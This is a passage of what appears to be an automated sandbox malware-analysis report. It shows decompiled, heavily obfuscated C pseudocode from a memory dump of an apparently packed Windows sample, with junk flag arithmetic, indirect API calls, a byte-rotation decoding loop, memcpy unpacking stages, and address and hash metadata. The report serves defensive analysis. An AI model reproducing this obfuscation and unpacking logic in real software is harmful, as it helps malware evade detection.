					_t416 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_push(_t416);
				_t417 = _t493 + 0x43569a;
				if( *(_t493 + 0x4354fd) == 0) {
					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
					_v12 = _t584;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
					_t584 = _v12;
					_t417 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
				_push(_v16);
				_pop( *_t25);
				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
					_push(_v12);
					_pop( *_t31);
				}
				_push(_t625);
				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
					_t481 = _t493 + 0x4353d6;
					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
						_push(_v20);
						_pop( *_t39);
						_t481 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
					_push(_v12);
					_pop( *_t43);
				}
				_push(_t584);
				if( *(_t493 + 0x4356f5) == 0) {
					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
					_t504 = _t504;
				}
				_push(_a4);
				_pop( *_t53);
				_push(_v12);
				_pop(_t626);
				if( *(_t493 + 0x4358dc) == 0) {
					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
					_v16 = _t584;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
					if( *(_t493 + 0x435268) == 0) {
						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
						_t567 = _t567;
						_t477 =  *_t672;
						_t672 =  &(_t672[1]);
					}
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
					_t626 = _t626;
				}
				_v12 = _t504;
				_t585 = 0 ^ _a8;
				_t507 = _v12;
				if( *(_t493 + 0x435675) == 0) {
					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
					_t507 = _t507;
				}
				if( *(_t493 + 0x435732) == 0) {
					if( *(_t493 + 0x435142) == 0) {
						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
						_v16 = _t626;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
						_t626 = _v16;
					}
					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
					_v20 = _t507;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
						_push(_v12);
						_pop( *_t115);
					}
				}
				_push( *((intOrPtr*)(_t626 + 8)));
				if( *(_t493 + 0x435898) == 0) {
					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
					_v12 = _t585;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
					_t585 = _v12;
				}
				_push(_t585);
				if( *(_t493 + 0x4358d8) == 0) {
					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
					 *_t672 = _t567;
					 *(_t493 + 0x4358d8) = 0 ^ _t466;
					_t567 = 0;
				}
				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
					if( *(_t493 + 0x4355f9) == 0) {
						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
						_t585 = _t585;
					}
					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
						_push(_v16);
						_pop( *_t145);
						_t462 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t146 = _t462;
					_push(_v16);
					_pop( *_t148);
				}
				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
				_push(_v12);
				_t509 =  &_v20;
				_t660 = _t657;
				_push(_t509);
				if( *(_t493 + 0x4359bd) == 0) {
					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
					_v20 = _t509;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
					_t509 = (_v20 & 0x00000000) +  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_t627 = _t626 +  *_t626;
				if( *(_t493 + 0x4357f2) == 0) {
					_push(_t509);
					if( *(_t493 + 0x4355bd) == 0) {
						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
						_v16 = _t627;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
						_t627 = _v16;
					}
					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
					_push(0xc);
					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
						 *_t672 = _t627;
						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
						_t627 = 0;
					}
					_push( *((intOrPtr*)(_t493 + 0x435346)));
					if( *(_t493 + 0x435815) == 0) {
						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
						_t627 = _t627;
					}
					_push(0x2e);
					_push( *((intOrPtr*)(_t493 + 0x435a19)));
					if( *(_t493 + 0x435a09) == 0) {
						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
						_v12 = _t509;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
						_t509 = _v12;
					}
					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
					if( *(_t493 + 0x4359dd) == 0) {
						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
						_t509 = _t509;
						_pop( *_t207);
						_t451 = _v12;
					}
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
					_t660 = _t660;
					_t509 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				do {
					asm("movsb");
					_t509 = _t509 - 1;
				} while (_t509 != 0);
				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
				_t512 = _t509;
				if( *(_t493 + 0x4355d5) == 0) {
					_push(_t493 + 0x435736);
					if( *(_t493 + 0x4352bf) == 0) {
						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
						_t585 = _t585;
					}
					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
					_push(_t585);
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
					if( *(_t493 + 0x435264) == 0) {
						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
						_v12 = _t567;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
						_t567 = _v12;
					}
				}
				_pop( *_t243);
				_t514 = _t512 & 0x00000000 ^ _v20;
				if( *(_t493 + 0x4359ed) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
					_t660 = _t660;
					_t514 =  *_t672;
					_t672 =  &(_t672[1]);
				}
				_t587 =  *_t672;
				_t673 =  &(_t672[1]);
				if( *(_t493 + 0x4351b7) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
					_v16 = _t514;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
					_pop( *_t261);
					_t514 = _v16;
				}
				_v12 = _t421;
				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
				_push(_t493);
				do {
					_t425 =  *_t629 & 0x000000ff;
					_t629 = _t629 + 1;
					if(_t425 == 0) {
						goto L64;
					}
					_push(_t514);
					 *_t673 = 1;
					_t515 = _t629;
					 *_t266 = _t629;
					_push(_v20);
					_pop(_t567);
					_v8 = 8;
					do {
						asm("rol eax, cl");
						_t495 = _t425;
						_t425 = _t567;
						asm("ror ebx, cl");
						_t269 =  &_v8;
						 *_t269 = _v8 - 1;
					} while ( *_t269 != 0);
					 *_t673 = _t515;
					_t425 = _t495;
					 *_t271 = 0;
					_t514 = 0 ^ _v12;
					L64:
					asm("stosb");
					_t514 = _t514 - 1;
				} while (_t514 != 0);
				_pop( *_t273);
				_t497 = 0 ^ _v12;
				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
					 *_t279 = _t425;
					_push(_v12);
					_pop( *_t281);
				}
				if( *(_t497 + 0x435122) == 0) {
					_t283 = _t497 + 0x435182; // 0x435182
					if( *(_t497 + 0x4357e2) == 0) {
						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
						_v12 = _t587;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
						_t587 = _v12;
					}
					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
					_v20 = _t567;
					 *(_t497 + 0x435122) = _t425;
					_t567 = _v20;
					if( *(_t497 + 0x4354ca) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
						 *_t673 = _t660;
						 *(_t497 + 0x4354ca) = _t425;
						_t660 = 0;
					}
				}
				if(_a4 != 0) {
					if( *(_t497 + 0x435250) == 0) {
						_t303 = _t497 + 0x4358c0; // 0x4358c0
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
						 *_t673 = _t629;
						 *(_t497 + 0x435250) = 0 ^ _t425;
						_t629 = 0;
					}
					if(_a8 != 0) {
						if( *(_t497 + 0x435213) == 0) {
							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
							_t587 = _t587;
						}
						_t425 = E00491C5D(_t497, _t514, _t567, _t629, _a8, _a4);
					}
				}
				_pop( *_t315);
				_t568 = _v20;
				if( *(_t497 + 0x4352f3) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
					_push(_t514);
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
					_t568 =  *_t673;
					_t673 = _t673 - 0xfffffffc;
				}
				if(_t568 > 0) {
					if( *(_t497 + 0x4354b6) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
						_v12 = _t587;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
					}
					_push(_a4);
					_pop( *_t339);
					_push(_v16);
					_pop(_t590);
					_push(_t590);
					 *_t673 = _t629;
					_t520 =  *(_t590 + 4);
					_t634 = 0;
					if( *(_t497 + 0x4350bc) == 0) {
						_t343 = _t497 + 0x4355b5; // 0x4355b5
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
						_push(0);
						 *_t673 = _t660;
						 *(_t497 + 0x4350bc) = 0 ^ _t425;
						_t520 =  *_t673;
						_t673 =  &(_t673[1]);
					}
					_v16 = _t497;
					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
					_t500 = _v16;
					if( *(_t500 + 0x435659) == 0) {
						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
						_v12 = _t590;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
						_t590 = _v12;
						 *_t357 = _t520;
						_t520 = _t520 & 0x00000000 ^ _v12;
						 *_t359 = _t427;
						_t427 = _v16;
					}
					_push(_t520);
					_push(_t520);
					_v16 = _t634;
					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
					_t637 = _v16;
					if( *(_t500 + 0x4353fa) == 0) {
						_t365 = _t500 + 0x43595c; // 0x43595c
						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
						_v16 = _t590;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
						_t590 = _v16;
						_t570 = (_t570 & 0x00000000) +  *_t673;
						_t673 = _t673 - 0xfffffffc;
					}
					_v16 = _t520;
					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
					_push( *_t673);
					 *_t673 =  *_t673 - _t570;
					_pop(_t525);
					if( *(_t500 + 0x435984) == 0) {
						_t379 = _t500 + 0x435829; // 0x435829
						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
						_t590 = _t590;
						_t570 =  *_t673;
						_t673 = _t673 - 0xfffffffc;
						 *_t385 = _t379;
						_t525 = _t525 & 0x00000000 | _v12;
					}
					_t640 = _t639 + _t525;
					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
					_t503 = _t500;
					if( *(_t503 + 0x43579a) == 0) {
						_t389 = _t503 + 0x4359c1; // 0x4359c1
						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
						_v16 = _t527;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
						 *_t397 = _t389;
						_t570 = _t570 & 0x00000000 | _v12;
						 *_t399 = _t570;
						_t527 = _v20;
					}
					memcpy(_t590, _t640, _t527);
					_t676 =  &(_t673[3]);
					_t592 = _t640 + _t527 + _t527;
					_push(_a8);
					_pop( *_t402);
					_push(_v20);
					_pop(_t641);
					if( *(_t503 + 0x4352b7) == 0) {
						_t405 = _t503 + 0x435237; // 0x435237
						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
						_v20 = _t641;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
						_t641 = _v20;
						_t570 =  *_t676;
						_t676 = _t676 - 0xfffffffc;
					}
					_t677 = _t676 - 0xfffffffc;
					_push(0 ^  *_t676);
					 *_t677 =  *_t677 - _t570;
					_pop(_t531);
					_t429 = memcpy(_t592, _t641, _t531);
					_t678 = _t677 + 0xc;
					 *_t414 = _t429;
					_t629 =  *_t678;
					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
					_t673 =  &(_t678[4]);
					_t587 = _t629 + (0 | _v12) + (0 | _v12);
				}
				return _t425;
			}

0x00493726
0x00493726
0x00493726
0x00493726
0x00493726
0x00493733
0x0049373b
0x00493743
0x00493746
0x00493749
0x00493749
0x0049374f
0x0049375c
0x00493766
0x0049376e
0x00493775
0x0049377b
0x0049377e
0x00493781
0x00493781
0x00493784
0x00493785
0x00493792
0x00493795
0x0049379b
0x004937a3
0x004937aa
0x004937b0
0x004937b5
0x004937b8
0x004937b8
0x004937c3
0x004937c6
0x004937c9
0x004937d6
0x004937e5
0x004937e8
0x004937eb
0x004937eb
0x004937f1
0x004937f9
0x004937fb
0x00493808
0x00493818
0x0049381b
0x0049381e
0x0049382a
0x0049382d
0x0049382d
0x00493838
0x0049383b
0x0049383e
0x0049383e
0x00493844
0x0049384c
0x0049385a
0x00493866
0x0049386d
0x00493873
0x00493873
0x00493874
0x00493877
0x0049387a
0x0049387d
0x00493885
0x00493895
0x0049389b
0x004938a3
0x004938aa
0x004938b3
0x004938c0
0x004938c9
0x004938d5
0x004938dc
0x004938e2
0x004938e5
0x004938e8
0x004938e8
0x004938f1
0x004938f8
0x004938fe
0x004938fe
0x004938ff
0x00493907
0x00493909
0x00493913
0x0049391c
0x00493928
0x0049392f
0x00493935
0x00493935
0x0049393d
0x0049394a
0x0049394c
0x00493952
0x0049395a
0x00493961
0x00493967
0x00493967
0x0049396a
0x00493970
0x00493978
0x0049397f
0x0049398f
0x004939bd
0x004939c0
0x004939c3
0x004939c3
0x0049398f
0x004939c9
0x004939d3
0x004939dc
0x004939e2
0x004939ea
0x004939f1
0x004939f7
0x004939f7
0x004939fa
0x00493a02
0x00493a06
0x00493a0e
0x00493a15
0x00493a1b
0x00493a1b
0x00493a23
0x00493a2c
0x00493a30
0x00493a3c
0x00493a43
0x00493a49
0x00493a49
0x00493a4c
0x00493a59
0x00493a81
0x00493a84
0x00493a87
0x00493a8f
0x00493a92
0x00493a92
0x00493a96
0x00493a99
0x00493a9c
0x00493a9c
0x00493aa8
0x00493aab
0x00493ab8
0x00493aba
0x00493abb
0x00493ac3
0x00493acd
0x00493ad3
0x00493adb
0x00493ae2
0x00493af1
0x00493af4
0x00493af4
0x00493af7
0x00493b00
0x00493b06
0x00493b0e
0x00493b17
0x00493b1d
0x00493b25
0x00493b2c
0x00493b32
0x00493b32
0x00493b35
0x00493b3b
0x00493b44
0x00493b4d
0x00493b55
0x00493b5c
0x00493b62
0x00493b62
0x00493b63
0x00493b70
0x00493b7a
0x00493b86
0x00493b8d
0x00493b93
0x00493b93
0x00493b94
0x00493b96
0x00493ba3
0x00493bb1
0x00493bb7
0x00493bbf
0x00493bc6
0x00493bcc
0x00493bcc
0x00493bdb
0x00493be8
0x00493bf2
0x00493bfe
0x00493c05
0x00493c0b
0x00493c0c
0x00493c0f
0x00493c0f
0x00493c18
0x00493c1f
0x00493c25
0x00493c2c
0x00493c2f
0x00493c2f
0x00493c32
0x00493c32
0x00493c33
0x00493c33
0x00493c44
0x00493c50
0x00493c57
0x00493c5d
0x00493c65
0x00493c6d
0x00493c75
0x00493c7e
0x00493c8a
0x00493c91
0x00493c97
0x00493c97
0x00493c98
0x00493c9e
0x00493ca4
0x00493cab
0x00493cb9
0x00493cc2
0x00493cc8
0x00493cd0
0x00493cd7
0x00493cdd
0x00493cdd
0x00493cb9
0x00493ce6
0x00493ce9
0x00493cf3
0x00493cf6
0x00493d02
0x00493d09
0x00493d0f
0x00493d12
0x00493d15
0x00493d15
0x00493d1a
0x00493d1d
0x00493d27
0x00493d30
0x00493d36
0x00493d3e
0x00493d45
0x00493d50
0x00493d53
0x00493d53
0x00493d56
0x00493d61
0x00493d66
0x00493d67
0x00493d67
0x00493d6a
0x00493d6d
0x00000000
0x00000000
0x00493d6f
0x00493d71
0x00493d78
0x00493d7f
0x00493d82
0x00493d85
0x00493d86
0x00493d8d
0x00493d8d
0x00493d8f
0x00493d91
0x00493d93
0x00493d95
0x00493d95
0x00493d95
0x00493d9c
0x00493da3
0x00493da8
0x00493dab
0x00493dae
0x00493dae
0x00493daf
0x00493daf
0x00493db4
0x00493db7
0x00493dc1
0x00493dcf
0x00493dd6
0x00493dd9
0x00493ddc
0x00493ddc
0x00493de9
0x00493deb
0x00493df9
0x00493e01
0x00493e07
0x00493e0f
0x00493e16
0x00493e1c
0x00493e1c
0x00493e1f
0x00493e25
0x00493e2c
0x00493e32
0x00493e3c
0x00493e3e
0x00493e46
0x00493e4d
0x00493e53
0x00493e53
0x00493e3c
0x00493e58
0x00493e61
0x00493e63
0x00493e6a
0x00493e72
0x00493e79
0x00493e7f
0x00493e7f
0x00493e84
0x00493e8d
0x00493e8f
0x00493e9b
0x00493ea2
0x00493ea8
0x00493ea8
0x00493eaf
0x00493eaf
0x00493e84
0x00493eb4
0x00493eb7
0x00493ec1
0x00493eca
0x00493ed0
0x00493ed6
0x00493edd
0x00493eea
0x00493eed
0x00493eed
0x00493ef3
0x00493f00
0x00493f27
0x00493f2d
0x00493f35
0x00493f3c
0x00493f42
0x00493f45
0x00493f48
0x00493f4b
0x00493f4e
0x00493f4f
0x00493f52
0x00493f5a
0x00493f5c
0x00493f64
0x00493f67
0x00493f6e
0x00493f74
0x00493f76
0x00493f7d
0x00493f86
0x00493f89
0x00493f89
0x00493f8c
0x00493f98
0x00493f9a
0x00493fa4
0x00493fa8
0x00493fae
0x00493fb6
0x00493fbd
0x00493fc3
0x00493fcc
0x00493fcf
0x00493fd2
0x00493fd5
0x00493fd5
0x00493fd8
0x00493fd9
0x00493fda
0x00493fe5
0x00493fe7
0x00493ff1
0x00493ff4
0x00493ffb
0x00494001
0x00494009
0x00494010
0x00494016
0x0049401f
0x00494022
0x00494022
0x00494025
0x00494031
0x00494039
0x0049403a
0x0049403d
0x00494045
0x00494049
0x00494050
0x0049405c
0x00494063
0x00494069
0x0049406c
0x0049406f
0x00494078
0x0049407b
0x0049407b
0x0049407e
0x0049408a
0x0049408c
0x00494094
0x00494098
0x0049409f
0x004940a5
0x004940ad
0x004940b4
0x004940c3
0x004940c6
0x004940cb
0x004940ce
0x004940ce
0x004940d1
0x004940d1
0x004940d1
0x004940d3
0x004940d6
0x004940d9
0x004940dc
0x004940e4
0x004940e7
0x004940ee
0x004940f4
0x004940fc
0x00494103
0x00494109
0x0049410e
0x00494111
0x00494111
0x00494119
0x0049411c
0x0049411d
0x00494120
0x00494121
0x00494121
0x00494136
0x0049413e
0x00494144
0x00494144
0x00494144
0x00494144
0x0049415f

APIs

OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 00493811

Memory Dump Source

Source File: 0000000D.00000002.559938284.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: true

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction ID: eb2909b88ab27d9941e919f7e1d3d60b246ec8c8f06006550ecdcb0e50001d78
Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction Fuzzy Hash: 4F624E72800604EFFF049FA0C889B9A7BB5FF24321F0851AADD1D9E199D77815A4CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0049242A, Relevance: 2.1, APIs: 1, Instructions: 592
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0049242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
				signed int _v8;
				signed int _v12;
				signed int _t337;
				signed int _t339;
				void* _t346;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				void* _t364;
				void* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				signed int _t374;
				signed int _t377;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				signed int _t388;
				signed int _t391;
				signed int _t392;
				signed int _t394;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t404;
				signed int _t405;
				signed int _t408;
				signed int _t409;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t420;
				signed int _t423;
				signed int _t428;
				signed int _t431;
				signed int _t433;
				signed int _t454;
				signed int _t457;
				signed int _t479;
				signed int _t481;
				signed int _t484;
				void* _t486;
				signed int _t489;
				void* _t492;
				signed int _t500;
				signed int _t503;
				void* _t516;
				signed int _t523;
				signed int _t526;
				signed int _t529;
				void* _t531;
				signed int _t562;
				void* _t565;
				void* _t568;
				signed int* _t571;
				signed int* _t572;
				signed int* _t574;
				signed int* _t575;

				_t523 = __esi;
				_t479 = __edi;
				_t450 = __edx;
				_t426 = __ecx;
				_t417 = __ebx;
				if( *(__ebx + 0x4351c7) == 0) {
					_push(__ecx);
					_push(__edx);
					_push(__ebx + 0x4351ef);
					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_v12 = __edx;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
					_pop( *_t11);
					_t450 = _v12 & 0x00000000 ^ _v12;
					_pop( *_t13);
					_t426 = __ecx & 0x00000000 | _v12;
				}
				if( *(_t417 + 0x4352b0) == 0) {
					_push(_t426);
					_push(_t450);
					if( *(_t417 + 0x4355c5) == 0) {
						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
						_v12 = _t523;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
						_t523 = _v12;
					}
					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
